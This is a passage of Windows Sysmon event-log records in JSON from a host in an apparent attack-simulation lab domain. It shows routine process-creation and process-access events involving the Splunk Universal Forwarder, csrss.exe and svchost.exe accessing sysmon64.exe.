{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5718,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.016\r\nSourceProcessGUID: {A837DB8D-0335-5F25-0000-0010FDC70A00}\r\nSourceProcessId: 2576\r\nSourceThreadId: 4604\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.016","SourceProcessGUID":"{A837DB8D-0335-5F25-0000-0010FDC70A00}","SourceProcessId":"2576","SourceThreadId":"4604","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5719,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.456\r\nProcessGuid: {A837DB8D-0336-5F25-0000-001088CA0A00}\r\nProcessId: 4296\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.456","ProcessGuid":"{A837DB8D-0336-5F25-0000-001088CA0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5720,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0336-5F25-0000-001088CA0A00}\r\nTargetProcessId: 4296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0336-5F25-0000-001088CA0A00}","TargetProcessId":"4296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5721,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0336-5F25-0000-001088CA0A00}\r\nTargetProcessId: 4296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0336-5F25-0000-001088CA0A00}","TargetProcessId":"4296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5722,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5723,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5724,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5725,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:54.453","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5726,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:54.453\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 